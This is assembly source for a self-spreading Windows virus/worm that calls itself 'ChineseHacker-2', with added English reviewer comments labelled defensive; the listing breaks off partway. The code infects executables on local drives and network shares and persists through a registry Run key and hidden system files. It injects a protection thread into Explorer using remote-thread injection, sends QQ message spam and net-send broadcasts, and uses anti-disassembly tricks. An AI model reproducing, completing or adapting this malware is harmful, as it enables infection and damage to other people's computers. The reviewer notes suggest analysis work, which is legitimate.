include wap32.inc
;-----------------------------------------------------------------------
; ApiAddressList - layout of the runtime-resolved API address table.
;
; The table is not static data: the code below carves it out of the
; stack (sub esp,size ApiAddressList+10h), fills each slot with stosd
; from a GetProcAddress result, and afterwards keeps a fixed pointer to
; it in esi ([esi.KnlXxx] everywhere else). Slot order therefore matches
; the order in which the name strings are pushed by PushKnlApiStr,
; PushUser32ApiStr, etc. - reordering a field here without reordering
; the corresponding string list would silently mis-bind every API.
;
; Review note (defensive): none of these Windows APIs is declared via
; extrn in this file (only MessageBoxA and ExitProcess are), so the
; loaded image's import table does not list them; each name is instead
; present as a plain NUL-terminated ASCII string in the body, which is
; what string- and API-set-based scanners key on.
;-----------------------------------------------------------------------
ApiAddressList struc
;Kernel32.DLL
KnlLoadLibraryA dd ?                    ; first slot; used to load the remaining DLLs
KnlCreateMutexA dd ?
KnlGetLastError dd ?
KnlGetCommandLineA dd ?
KnlWinExec dd ?
KnlGetDriveTypeA dd ?
KnlSetCurrentDirectoryA dd ?
KnlFindFirstFileA dd ?
KnlFindNextFileA dd ?
KnlFindClose dd ?
KnlSetFileAttributesA dd ?
KnlSetFileTime dd ?
KnlLOpen dd ?
KnlLRead dd ?
KnlLWrite dd ?
KnlLSeek dd ?
KnlLClose dd ?
KnlSleep dd ?
KnlRegisterServiceProc dd ?             ; resolved as 'RegisterServiceProcess'; NULL result is used as the Win9x/2k discriminator
KnlGetCurrentProcessId dd ?
KnlOpenProcess dd ?
KnlWriteProcessMemory dd ?
KnlCreateRemoteThread dd ?
KnlCreateKernelThread dd ?              ; resolved as 'CreateKernelThread' (undocumented per the original comment)
KnlCloseHandle dd ?
KnlWaitForSingleObject dd ?
KnlVirtualAllocEx dd ?
KnlGetSystemDirectoryA dd ?
KnlLCreat dd ?
KnlCreateThread dd ?
KnlTerminateThread dd ?
KnlWideCharToMultiByte dd ?
KnlGetComputerNameA dd ?
KnlGetSystemTime dd ?
;User32.DLL
UserGetWinThreadProcId dd ?
UserFindWindowA dd ?
UserMessageBoxA dd ?
UserGetWindow dd ?
UserSendMessageA dd ?
UserwsprintfA dd ?
;AdvApi32.DLL
AdvRegOpenKeyA dd ?
AdvRegSetValueExA dd ?
AdvRegQueryValueExA dd ?
AdvRegNotifyChange dd ?
;Mpr.DLL
MprWNetOpenEnumA dd ?
MprWNetEnumResourceA dd ?
MprWNetCloseEnum dd ?
;WSock32.DLL
WsWSAStartup dd ?
WsWSACleanup dd ?
Wssend dd ?
Wshtons dd ?
Wsgethostbyname dd ?
Wsconnect dd ?
Wssocket dd ?
Wsclosesocket dd ?
Wsrecv dd ?
;VirusData - per-instance state kept in the same stack block, not API slots
DataKnlMzHeader dd ?                    ; kernel32 image base found by the 'MZ' back-scan
DataVirusSize dd ?                      ; not written anywhere in the visible portion - confirm against the rest of the file
DataRemoteThread dd ?                   ; handle of the protection thread; 0 while none is running
ApiAddressList ends
MAX_BUFF_SIZE=1000h                     ; 4 KiB scratch buffer size (usage not in the visible portion)
VirusSize=offset VirusEnd-offset Start+10h ; body length from Start to VirusEnd (VirusEnd is defined later in the file) plus 10h slack
extrn MessageBoxA: proc                 ; the only two statically imported APIs; everything else is resolved at runtime
extrn ExitProcess: proc
.586p
.model flat,stdcall
; Review note (defensive): Start: and all following code are placed in the
; writable .data section rather than .text, so the body executes from a
; writable image section - an observable W^X violation in the loaded image.
.data
Start:
pushad
call VirusEnd
NeedDecode:
mov esi,[esp+4*8]
call PushRunError ;得到意外繼續執行地址
popad
PushXXXCode db 68h ;JmpOldApp
OldEntryRVA dd offset Exit
ret
db 0e9h ;靜態反匯編干擾
PushRunError:
pop ecx
call SetSehFrame
FindKernel32:
and esi,0fffff000h ;得到Kernel.PELoader代碼位置(不精確)
LoopFindKernel32:
sub esi,1000h
cmp word ptr[esi],'ZM' ;搜索EXE文件頭
jnz short LoopFindKernel32
GetPeHeader:
movzx edi,word ptr[esi.PEHeaderOffset]
add edi,esi
mov ebp,[edi.fhExportsRVA]
add ebp,esi ;得到輸出函數表
mov ebx,[ebp.etExportNameList]
add ebx,esi ;得到輸出函數名表
xor eax,eax ;函數序號計數
mov edx,esi ;暫存Kernel32模塊句柄
LoopFindApiStr:
add ebx,04
inc eax ;增加函數計數
mov edi,[ebx]
add edi,edx ;得到一個Api函數名字符串
call PushStrGetProcAddress
db 'GetProcAddress',0
PushStrGetProcAddress:
pop esi ;得到Api名字字符串
xor ecx,ecx
mov cl,15 ;GetProcAddress串大小
cld
rep cmpsb
jnz short LoopFindApiStr
mov esi,edx
mov ebx,[ebp.etExportOrdlList]
add ebx,esi ;取函數序號地址列表
movzx ecx,word ptr[ebx+eax*2]
mov ebx,[ebp.etExportAddrList]
add ebx,esi ;得到Kernel32函數地址列表
mov ebx,[ebx+ecx*4]
add ebx,esi ;計算GetProcAddress函數地址
sub esp,size ApiAddressList+10h ;在堆棧中存放API的地址
mov edi,esp
mov [esp.DataKnlMzHeader],esi
call PushKnlApiStr
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位Kernel32.dll Api
loop LoopRelocKnlApi
mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
PushUser32Str:
call eax
mov esi,eax
call PushUser32ApiStr
LoopRelocUser32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位User32.dll Api
loop LoopRelocUser32Api
mov eax,[esp.KnlLoadLibraryA]
call PushAdvApi32Str
db 'ADVAPI32.DLL',0
PushAdvApi32Str:
call eax
mov esi,eax
call PushAdvApiStr
LoopRelocAdvApi32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位ADVAPI32.dll Api
loop LoopRelocAdvApi32Api
mov eax,[esp.KnlLoadLibraryA]
call PushMprStr
db 'MPR.DLL',0
PushMprStr:
call eax
mov esi,eax
call PushMprApiStr
LoopRelocMprApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocMprApi
mov eax,[esp.KnlLoadLibraryA]
call PushWsStr
db 'WSOCK32.DLL',0
PushWsStr:
call eax
mov esi,eax
call PushWsApiStr
LoopRelocWsApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocWsApi
mov esi,esp ;函數調用列表指針,以后固定不變
call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;檢查病毒是否已經運行
jz short ExecOldProgram
int 3; ;人工引發異常執行原程序,JmpOldApp
db 0e9h ;靜態反匯編干擾
ExecOldProgram: ;加載自己,運行老程序
call [esi.KnlGetCommandLineA]
call [esi.KnlWinExec],eax,L 01
call PushNextRunErrorProc;保護注冊表與創建遠程線程
mov esi,esp ;意外繼續執行地址
StartScan:
call PushScanErrorProc;搜索本地與遠程目錄文件
mov esi,esp ;恢復函數調用列表指針
call [esi.KnlSleep],1000*60;*10
jmp short StartScan ;休眠10分鐘重新搜索文件
db 0e9h ;靜態反匯編干擾
PushScanErrorProc:
pop ecx
call SetSehFrame
ScanExeFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]
mov [edx],eax ;設置找到文件的處理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到目錄的處理程序
call EnumLogDrive ;搜索本地文件,并傳染病毒
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到NET目錄的處理程序
call EnumNetResource ;搜索遠程文件,并傳染病毒
ScanMailFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
mov [edx],eax ;設置找到文件的處理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到目錄的處理程序
call EnumLogDrive ;搜索本地文件,發郵件
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到NET目錄的處理程序
call EnumNetResource ;搜索遠程文件,發郵件
CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
cmp eax,-1 ;睡眠8小時
jnz short AddWordToQQMsg
NeedCreateRemote:
push esi
call PushWaitErrorProc
pop esi
call GetNetSendMsg
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax
call [esi.KnlWinExec],eax,0
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx
call SetSehFrame
call ProcessProtect ;重新啟動遠程線程保護/內帶意外
db 0e9h ;靜態反匯編干擾
AddWordToQQMsg:
call GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
pop edi
mov eax,[esi.UserFindWindowA];填寫線程用API
mov [edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserGetWindow]
mov [edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserSendMessageA]
mov [edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.KnlSleep]
mov [edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax
lea eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
push eax ;創建QQ附加消息線程
call [esi.KnlCreateThread],0,0,eax,eax,0,esp
mov ebx,eax ;保證SendQQMsg線程活動10分鐘
pop eax
CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
push eax ;睡眠10分鐘
call [esi.KnlTerminateThread],ebx,0
pop eax
cmp eax,-1
jz short NeedCreateRemoteAgain
int 3; ;人工意外,繼續搜索文件
db 0e9h ;靜態反匯編干擾
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx
call SetSehFrame
call ProcessProtect ;重新啟動遠程線程保護/內帶意外
db 0e9h ;靜態反匯編干擾
PushNextRunErrorProc: ;保護注冊表與創建遠程線程
pop ecx
call SetSehFrame
RegisterProtect:
sub esp,100h ;構造病毒路徑
call BuildVirusPathInStack,esp
mov edi,esp
call [esi.KnlLCreat],edi,10h
cmp eax,-1h ;創建獨占文件
jz short OptRegister
mov ebx,eax
call UnzipVirusToFile;解壓PE文件
call [esi.KnlLSeek],ebx,0,0
call FixPeFile,ebx ;傳染病毒給PE文件,不關閉文件,防刪除
mov edi,esp ;把病毒設置為:隱藏+系統+只讀
call [esi.KnlSetFileAttributesA],edi,7h
OptRegister:
push eax
push esp
call PushRegKeyStr
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
call [esi.AdvRegOpenKeyA],080000002h
pop ebx
mov eax,esp
call PushKeyNameStr ;修改注冊表,自動Run項目
db 'Runonce',0
PushKeyNameStr:
pop ecx
call [esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h
call GetVirusBaseInEdi
GetVirusBaseInEdi:
pop edi ;得到病毒位置參照偏移量
mov eax,[esi.AdvRegQueryValueExA];填寫API地址
mov [edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegSetValueExA]
mov [edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegNotifyChange]
mov [edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax
lea eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]
push eax ;創建注冊表監視線程
call [esi.KnlCreateThread],0,0,eax,ebx,0,esp
pop eax ;不關閉注冊表句柄,監視線程續用
ProcessProtect: ;創建遠程線程
xor eax,eax
mov [esi.DataRemoteThread],eax
sub esp,100h
call BuildVirusPathInStack,esp
call GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
pop edi ;得到病毒位置參照偏移量
mov eax,[esi.KnlOpenProcess];填寫API地址
mov [edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWaitForSingleObject]
mov [edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWinExec]
mov [edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlRegisterServiceProc]
or eax,eax ;依靠函數RehSvrProc來假定操作系統類別9x/2k
jz short Process2kProtect
Process9xProtect:
call eax,L 0,L 1 ;在Win9x下先隱藏本進程,一級保護
mov edx,[esi.DataKnlMzHeader]
movzx ebx,word ptr[edx.PEHeaderOffset]
add ebx,edx
mov ecx,[ebx.fhObjectTable00.otRVA]
mov ebp,[ebx.fhHeaderSize]
sub ecx,ebp
cmp ecx,200h
jb short Process9xProtectEnd
add ebp,edx ;查詢Knl空間
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
call MoveDataToKnl,edx,ebp,ProcessProtectProcSize
lea ecx,[ebp+ProcessProtectProcSize]
mov edx,esp ;復制線程代碼數據到Kernel32.dll
call MoveDataToKnl,edx,ecx,100h
call [esi.KnlGetCurrentProcessId]
push eax ;創建Kernel線程,未公開函數
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
mov [esi.DataRemoteThread],eax
pop eax ;啟動進程保護線程
call [esi.KnlSleep],500
Process9xProtectEnd:
int 3 ;人工異常
db 0e9h ;反匯編干擾
Process2kProtect: ;填寫API地址
call [esi.UserFindWindowA],0,0
push eax ;找Explorer進程/或者Top窗口程序
call [esi.UserGetWinThreadProcId],eax,esp
call [esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
or eax,eax ;打開該進程
jz short Process2kProtectEnd
mov ebx,eax
call [esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
or eax,eax
jz short Close2kHandle
mov ebp,eax ;分配遠程空間
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
push eax
call [esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
pop eax ;復制代碼到遠程地址空間
cmp eax,ProcessProtectProcSize
jnz short Close2kHandle
mov edx,esp
lea ecx,[ebp+ProcessProtectProcSize]
push eax
call [esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
call [esi.KnlGetCurrentProcessId]
call [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
mov [esi.DataRemoteThread],eax
pop eax ;啟動進程保護線程
Close2kHandle:
call [esi.KnlCloseHandle],ebx
call [esi.KnlSleep],500
Process2kProtectEnd:
int 3 ;人工異常
db 0e9h ;反匯編干擾
PushKnlApiStr: ;:ecx=函數名個數
pop eax ;彈出返回地址
mov ecx,esp
call PushKnlApiStr33
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:
call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;靜態反匯編干擾
PushUser32ApiStr:
pop eax
mov ecx,esp
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0